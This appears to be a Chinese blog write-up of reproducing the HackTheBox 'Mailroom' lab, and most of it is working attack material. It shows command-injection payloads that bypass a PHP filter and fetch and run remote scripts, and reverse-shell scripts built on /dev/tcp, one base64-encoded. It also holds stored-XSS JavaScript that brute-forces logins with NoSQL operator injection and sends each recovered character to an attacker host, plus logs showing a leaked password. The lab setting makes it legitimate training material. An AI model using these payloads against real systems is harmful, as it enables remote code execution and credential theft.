猜测: 一旦root登录成功 perl和kpcli进程就都没了.

看下面,猜的不准,是每隔1分钟运行kpcli进程,每隔3分钟清理

root@mailroom:~# cat ~/cleanup.sh
#!/bin/bash

# Clear inquiries
/usr/bin/rm -rf /root/containers/sites/mailroom/inquiries/*

# Copy back template inquiry
/usr/bin/cp /root/containers/5657465f7712d50b2aaceaa09453c71f.html /root/containers/sites/mailroom/inquiries/

# Restore gitea
/usr/bin/rm -rf /root/containers/gitea/*
/usr/bin/cp -r /root/containers/gitea_backup/* /root/containers/gitea/

# Clear tmp files
/usr/bin/rm -rf /tmp/*

# Clear past emails
echo "$(tail -n 10 /var/mail/tristan)" > /var/mail/tristan
root@mailroom:~# crontab  -l
# Edit this file to introduce tasks to be run by cron.
# 
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
# 
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').
# 
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
# 
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
# 
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
# 
# For more information see the manual pages of crontab(5) and cron(8)
# 
# m h  dom mon dow   command
*/3 * * * * /root/cleanup.sh >/dev/null 2>&1
*/1 * * * * /root/kpcli.sh >/dev/null 2>&1
root@mailroom:~#

看一下这台虚拟机靶机性能咋样:

root@mailroom:/tmp# df -h
Filesystem                         Size  Used Avail Use% Mounted on
udev                               1.9G     0  1.9G   0% /dev
tmpfs                              391M   41M  350M  11% /run
/dev/mapper/ubuntu--vg-ubuntu--lv  7.2G  5.4G  1.5G  79% /
tmpfs                              2.0G     0  2.0G   0% /dev/shm
tmpfs                              5.0M     0  5.0M   0% /run/lock
tmpfs                              2.0G     0  2.0G   0% /sys/fs/cgroup
/dev/sda2                          219M  108M   93M  54% /boot
overlay                            7.2G  5.4G  1.5G  79% /var/lib/docker/overlay2/68f15147525c63cc344606e5b29fc4ec921f656f55260b4600bc178cb459378a/merged
overlay                            7.2G  5.4G  1.5G  79% /var/lib/docker/overlay2/f029f39ea36301cfff86726028ab27e9734acd9199aee23fc6bae7334b411020/merged
shm                                 64M  1.1M   63M   2% /var/lib/docker/containers/a792a1685ae42e12a2e997b16ba6e2d3bd8eb2fb9009379ed9aea1b2f087881a/mounts/shm
shm                                 64M     0   64M   0% /var/lib/docker/containers/178ce6c64a6be27a55a5dbb37dde1d2786c6e610c78e36c911e159dee2573f1c/mounts/shm
overlay                            7.2G  5.4G  1.5G  79% /var/lib/docker/overlay2/0bd824ad9f75604012958f36946a505389003d86fca4aeebafee5633ed3cf974/merged
shm                                 64M     0   64M   0% /var/lib/docker/containers/be13e7868b6371a6be9a28388202b131848556634f13b20060263e1571460ca3/mounts/shm
overlay                            7.2G  5.4G  1.5G  79% /var/lib/docker/overlay2/15152d7d89f89bb8394707d53a1787872a40454a4d6b656724f11167ca53b6e5/merged
shm                                 64M     0   64M   0% /var/lib/docker/containers/ed9dafc5f146dd54611d8e00e4f8cf5a302418effcf64de39f628f9c50599600/mounts/shm
tmpfs                              391M     0  391M   0% /run/user/1000
tmpfs                              391M     0  391M   0% /run/user/0
tmpfs                              391M     0  391M   0% /run/user/1001
root@mailroom:/tmp# free -m
              total        used        free      shared  buff/cache   available
Mem:           3901         600        1439          56        1860        2953
Swap:          2047           0        2047
root@mailroom:/tmp#

获取http://staff-review-panel.mailroom.htb/inspect.php源码:

docker cp containers_sites_1:/var/www/staffroom/inspect.php /home/

scp -P 40022 -o StrictHostKeyChecking=no /home/inspect.php [email protected]:/tmp/

删除了html代码后,如下:

<?php
session_start(); // Start a session
// Check if authorized
if (!isset($_SESSION['logged_in']) || $_SESSION['logged_in'] !== true) {
  header('Location: index.php'); // The user is NOT logged in, redirect back to the login page
  exit;
}

$data = '';
if (isset($_POST['inquiry_id'])) {
  $inquiryId = preg_replace('/[\$<>;|&{}\(\)\[\]\'\"]/', '', $_POST['inquiry_id']);
  $contents = shell_exec("cat /var/www/mailroom/inquiries/$inquiryId.html");

  // Parse the data between  and </p>
  $start = strpos($contents, '<p class="lead mb-0">');
  if ($start === false) {
    // Data not found
    $data = 'Inquiry contents parsing failed';
  } else {
    $end = strpos($contents, '</p>', $start);
    $data = htmlspecialchars(substr($contents, $start + 21, $end - $start - 21));
  }
}

$status_data = '';
if (isset($_POST['status_id'])) {
  $inquiryId = preg_replace('/[\$<>;|&{}\(\)\[\]\'\"]/', '', $_POST['status_id']);
  $contents = shell_exec("cat /var/www/mailroom/inquiries/$inquiryId.html");

  // Parse the data between  and </p>
  $start = strpos($contents, '<p class="lead mb-1">');
  if ($start === false) {
    // Data not found
    $status_data = 'Inquiry contents parsing failed';
  } else {
    $end = strpos($contents, '</p>', $start);
    $status_data = htmlspecialchars(substr($contents, $start + 21, $end - $start - 21));
  }
}

?> 
                <?php echo $_SESSION['name']; ?> 
                  <?php echo $data; ?> 
                  <?php echo $status_data; ?>

有session效验,关键两句代码如下:

$inquiryId = preg_replace('/[\$<>;|&{}\(\)\[\]\'\"]/', '', $_POST['inquiry_id']);
$contents = shell_exec("cat /var/www/mailroom/inquiries/$inquiryId.html");

源视频里需要先curl下载文件到/tmp目录下,然后bash调用执行,我想了个笨办法,只需一步执行:

r0的内容是:


myip2=$(  ip addr show tun0 |grep -Po '(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|[1-9])(\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)){3}' |head -n 1);
 
cat <<EOF>/tmp/r0.sh
id;
touch /tmp/XYZ;
setsid nc -lnvvp  10080&
bash -i >& /dev/tcp/$myip2/88 0>&1
EOF
 
cat /tmp/r0.sh;

`sleep 2``curl -o /tmp/AA5 http:///10.10.14.37:77/r0.sh``bash /tmp/AA5``echo 1`

curl -v -d "inquiry_id=\`sleep+2\`\`curl+-o+/tmp/1r2+http://10.10.14.37:77/r0.sh\`\`bash+/tmp/1r2\`\`echo+1\`" -H "Cookie: PHPSESSID=5539dfbf91caa882aa3368627bf56878" http://staff-review-panel.mailroom.htb/inspect.php

容器里的nc不支持-e选项,只能开一个正向telnet后门,无法建立反弹shell.

root@ed9dafc5f146:/var/www/html# which nc
/bin/nc
root@ed9dafc5f146:/var/www/html#
root@ed9dafc5f146:/var/www/html# nc -e
nc: invalid option -- 'e'
usage: nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval] [-M ttl]
      [-m minttl] [-O length] [-P proxy_username] [-p source_port]
      [-q seconds] [-s sourceaddr] [-T keyword] [-V rtable] [-W recvlimit]
      [-w timeout] [-X proxy_protocol] [-x proxy_address[:port]]
      [destination] [port]
root@ed9dafc5f146:/var/www/html#

# nc  10.10.14.37  88 -e /bin/sh

由于没有过滤回车,我们还可以利用回车来进行多语句执行:


curl -v --data-binary "inquiry_id=\`sleep+12
curl+-o+/tmp/3r2+http://10.10.14.37:77/r0.sh
bash+/tmp/3r2
echo+-n+1\`" -H "Cookie: PHPSESSID=5539dfbf91caa882aa3368627bf56878" \
http://staff-review-panel.mailroom.htb/inspect.php

如下方案反弹shell失败,原因不明:

提交参数:

`  ``curl http://127.0.0.1:77/r2.sh``  `


#  shell_exec("$inquiryId");
# 如上就可以



# 如下就不行
#  shell_exec("cat $inquiryId");


curl -v -d "inquiry_id=\`+\`\`curl+http://10.10.14.37:77/r2.sh\`\`+\`" \
-H "Cookie: PHPSESSID=5539dfbf91caa882aa3368627bf56878" \
http://staff-review-panel.mailroom.htb/inspect.php

r1.sh的内容是:

myip2=$(ip addr show tun0 |grep -Po '(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|[1-9])(\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)){3}' |head -n 1);
 
 
cat <<EOF>/tmp/r1.sh
bash -i >& /dev/tcp/$myip2/88 0>&1
EOF

cat /tmp/r1.sh;

r2.sh的内容是:

myip2=$(ip addr show tun0 |grep -Po '(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|[1-9])(\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)){3}' |head -n 1);

cat <<EOF>/tmp/r2.sh
bash -c {curl,http://$myip2:77/r1.sh}|bash
EOF

cat /tmp/r2.sh;

结合之前的回车换行来运行多语句,想出来另外一个思路:

不需要写文件,直接多语句执行:

先在本地kali上生成r8.sh文件:

myip2=$(ip addr show tun0 |grep -Po '(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|[1-9])(\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)){3}' |head -n 1);
 

w2=`echo "bash -i >& /dev/tcp/$myip2/88 0>&1"|base64`
echo $w2;
echo $w2|base64 -d;

cat <<EOF>/tmp/r8.sh
bash -c {echo,$w2}|{base64,-d}|{bash,-i}
EOF

cat /tmp/r8.sh;

然后在ssh [email protected] 后发起curl请求:

curl -v -d "inquiry_id=../../../../proc/cpuinfo
\`+\`\`curl+http://10.10.14.50:30088/r8.sh\`\`+\`
touch+/tmp/" -H "Cookie: PHPSESSID=5539dfbf91caa882aa3368627bf56878"  \
http://staff-review-panel.mailroom.htb/inspect.php

成功反弹shell.

小技巧:

xss破解用户名和密码的时候,如何延迟超过30秒?

经过测试靶机里的火狐浏览器,没有阻止open函数弹窗,可以通过这个方法来延时,甚至可以多开很多浏览器页面,使用kali做反向代理连接互联网网站.

curl -v -d 'email=qax%40gmail.com&title=maga2023&message=<script+src%3d"http%3a//10.10.14.50:30088/loader_user.js"></script><script+src%3d"http%3a//10.10.14.50:8090/?c=123"></script>'   http://mailroom.htb/contact.php

更新php的index.php:

echo "<?php header('Content-Type: application/x-javascript; charset=UTF-8');\
header('Access-Control-Allow-Origin: *');\
header('Access-Control-Allow-Headers: *');\
set_time_limit(300);sleep(120);\
echo 'console.log(120);';">/tmp/index.php ;

loader_user.js的源码:

function dateTimeToStringS(date, format) {
  if (date) {
    var o = {
      "M+": date.getMonth() + 1, // 
      "d+": date.getDate(), //            
      "h+": date.getHours() % 12 == 0 ? 12 : date.getHours() % 12,  
      "H+": date.getHours(), // 
      "m+": date.getMinutes(), // 
      "s+": date.getSeconds(), // 
      "q+": Math.floor((date.getMonth() + 3) / 3),  
      "S": date.getMilliseconds() // ms           
    };
    var week = {
      "0": "\u65e5",
      "1": "\u4e00",
      "2": "\u4e8c",
      "3": "\u4e09",
      "4": "\u56db",
      "5": "\u4e94",
      "6": "\u516d"
    };
    if (/(y+)/.test(format)) {
      format = format.replace(RegExp.$1, (date.getFullYear() + "").substr(4 - RegExp.$1.length));
    }
    if (/(E+)/.test(format)) {
      format = format.replace(RegExp.$1, ((RegExp.$1.length > 1) ? (RegExp.$1.length > 2 ? "\u661f\u671f" : "\u5468") : "") + week[date.getDay() + ""]);
    }
    for (var k in o) {
      if (new RegExp("(" + k + ")").test(format)) {
        format = format.replace(RegExp.$1, (RegExp.$1.length == 1) ? (o[k]) : (("00" + o[k]).substr(("" + o[k]).length)));
      }
    }
    return format;
  }
}

window.onunload=function()
{
fetch("http://10.10.14.50:30088/guess_username.js?fetch_unload_t="+dateTimeToStringS(new Date(),"yyyy-MM-dd-HH:mm:ss.S")  );
}

window.onbeforeunload=function()
{
fetch("http://10.10.14.50:30088/guess_username.js?fetch_beforeunload_t="+dateTimeToStringS(new Date(),"yyyy-MM-dd-HH:mm:ss.S")  );
}

fetch("http://10.10.14.50:30088/guess_username.js?fetch_first_t="+dateTimeToStringS(new Date(),"yyyy-MM-dd-HH:mm:ss.S")  );
setTimeout(function(){window.open("http://10.10.14.50:30088/loader_html.html?time="+dateTimeToStringS(new Date(),"yyyy-MM-dd-HH:mm:ss.S")  );},10000);


setTimeout(function(){
opener=null;
open('','_self');
close();
},60000);
//driver.set_page_load_timeout(30); 30秒后就关闭了(python ai.py进程结束),等不到60秒

loader_html.html的源码如下:

<!DOCTYPE html>
<html lang="en">
    <head>
        <title>guess_username</title>
    </head>
    <body>
    
    <script src='http://10.10.14.50:30088/guess_username.js'></script>
    <script src='http://10.10.14.50:30088/guess_password.js'></script>
    
    </body>
</html>

更新后的guess_username.js 源码:

/*
fetch("http://10.10.14.50:30088/xss.js?gu="+100*Math.random()).then(
(res3)=>{    var t2=res3.text();
    t2.then(   ( y3)=>
    {
    //console.log(y3);
    eval( y3 ) ; 
    }
     );
    //console.log(res3,t2);
    return t2; }
);
*/


async function callAuth(mail) {
    var http = new XMLHttpRequest();
    http.open('POST', "http://staff-review-panel.mailroom.htb/auth.php", true);
    http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    http.onload = function () {
        if (/"success":true/.test(this.responseText)) {
            notify(mail);
            cal("0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%'()+, -/:;<=>@[\]_`{}~", mail);
        }
    };
    http.send("email[$regex]=.*" + mail + "@mailroom.htb&password[$ne]=abc");
}
function notify(mail) {
    fetch("http://10.10.14.50:30088/r8.sh?" + mail);
}
function cal(chars, mail) {
    for (var i = 0; i < chars.length; i++) {
        callAuth(chars[i] + mail)
    }
}
var chars88 = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%'()+, -/:;<=>@[\]_`{}~";
cal(chars88, "")


 

console.log("5201314_maga");
fetch("http://10.10.14.50:30088/guess_username.js?in_fetch_guest_username.js="+100*Math.random());


window.onunload=function()
{
fetch("http://10.10.14.50:30088/guess_username.js?fetch_unload_ut="+100*Math.random());
}

window.onbeforeunload=function()
{
fetch("http://10.10.14.50:30088/guess_username.js?fetch_beforeunload_ut="+100*Math.random()  );
}

setTimeout(function(){
opener=null;
open('','_self');
close();
},60000);// 60秒后关闭,整个firefox-esr进程终结

[2023-05-03T12:03:31.693Z]  "GET /loader_user.js" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[Wed May  3 12:03:31 2023] 10.10.11.209:39216 Accepted
[2023-05-03T12:03:31.861Z]  "GET /guess_username.js?fetch_first_t=2023-05-03-12:03:30.634" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:41.920Z]  "GET /loader_html.html?time=2023-05-03-12:03:40.638" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:42.036Z]  "GET /guess_username.js" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:42.111Z]  "GET /guess_password.js" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:43.195Z]  "GET /guess_username.js?in_fetch_guest_username.js=32.70788844267638" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:43.572Z]  "GET /guess_password.js?6" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:44.285Z]  "GET /guess_password.js?69" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:45.954Z]  "GET /guess_password.js?69t" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:46.869Z]  "GET /guess_password.js?69tr" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:48.451Z]  "GET /guess_password.js?69tri" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:50.510Z]  "GET /guess_password.js?69tris" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:52.582Z]  "GET /r8.sh?n" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:53.417Z]  "GET /guess_password.js?69trisR" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:55.632Z]  "GET /r8.sh?an" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:57.588Z]  "GET /guess_password.js?69trisRu" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:59.363Z]  "GET /r8.sh?tan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:04:01.129Z]  "GET /guess_password.js?69trisRul" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:04:02.564Z]  "GET /r8.sh?stan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:04:04.469Z]  "GET /guess_password.js?69trisRule" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:04:06.678Z]  "GET /r8.sh?istan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:04:08.018Z]  "GET /guess_password.js?69trisRulez" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:04:09.113Z]  "GET /r8.sh?ristan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:04:09.905Z]  "GET /guess_password.js?69trisRulez!" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:04:11.824Z]  "GET /r8.sh?tristan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:04:13.160Z]  "GET /favicon.ico" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[Wed May  3 12:05:31 2023] 10.10.11.209:39216 [200]: GET /?c=123
[Wed May  3 12:05:31 2023] 10.10.11.209:39216 Closing

目前git操作不熟:

root@3ae5bc817f72:/etc/apache2/sites-enabled# ls -al 
total 8
drwxr-xr-x 1 root root 4096 Jan 17 19:56 .
drwxr-xr-x 1 root root 4096 Nov 15 04:17 ..
lrwxrwxrwx 1 root root   36 Jan 17 19:56 000-mailroom.conf -> ../sites-available/000-mailroom.conf
lrwxrwxrwx 1 root root   37 Jan 17 19:56 001-staffroom.conf -> ../sites-available/001-staffroom.conf
lrwxrwxrwx 1 root root   33 Jan 17 19:56 002-gitea.conf -> ../sites-available/002-gitea.conf
root@3ae5bc817f72:/etc/apache2/sites-enabled# cat 000-mailroom.conf 
<VirtualHost *:80>
    ServerName mailroom.htb
    
    # Block access to template directory
    <Directory /var/www/mailroom/template>
        Require all denied
    </Directory>

    # Hide git directory
    RedirectMatch 404 /\.git

    # DocumentRoot
    DocumentRoot /var/www/mailroom
</VirtualHost>
root@3ae5bc817f72:/etc/apache2/sites-enabled# 



root@3ae5bc817f72:/etc/apache2/sites-enabled# cat 001-staffroom.conf 
<VirtualHost *:80>
    ServerName staff-review-panel.mailroom.htb

    # Allow CORS
    Header set Access-Control-Allow-Origin "*"
        
    # Block connections from outside localhost
    <Directory />
        Allow from 127.0.0.1
        Allow from 172.19.0.1
        Deny from all
    </Directory>

    # Hide git directory
    RedirectMatch 404 /\.git

    # DocumentRoot
    DocumentRoot /var/www/staffroom
</VirtualHost>
root@3ae5bc817f72:/etc/apache2/sites-enabled# 
root@3ae5bc817f72:/etc/apache2/sites-enabled# 
root@3ae5bc817f72:/etc/apache2/sites-enabled# cat 002-gitea.conf  
<VirtualHost *:80>
    ServerName git.mailroom.htb
    
    # Access to gitea docker
    ProxyPass / http://gitea:3000/
    ProxyPassReverse / http://gitea:3000/
    
</VirtualHost>
root@3ae5bc817f72:/etc/apache2/sites-enabled#

hackthebox Mailroom Hard难度 抄wp复现

猜你喜欢

hackthebox Mailroom Hard难度抄wp复现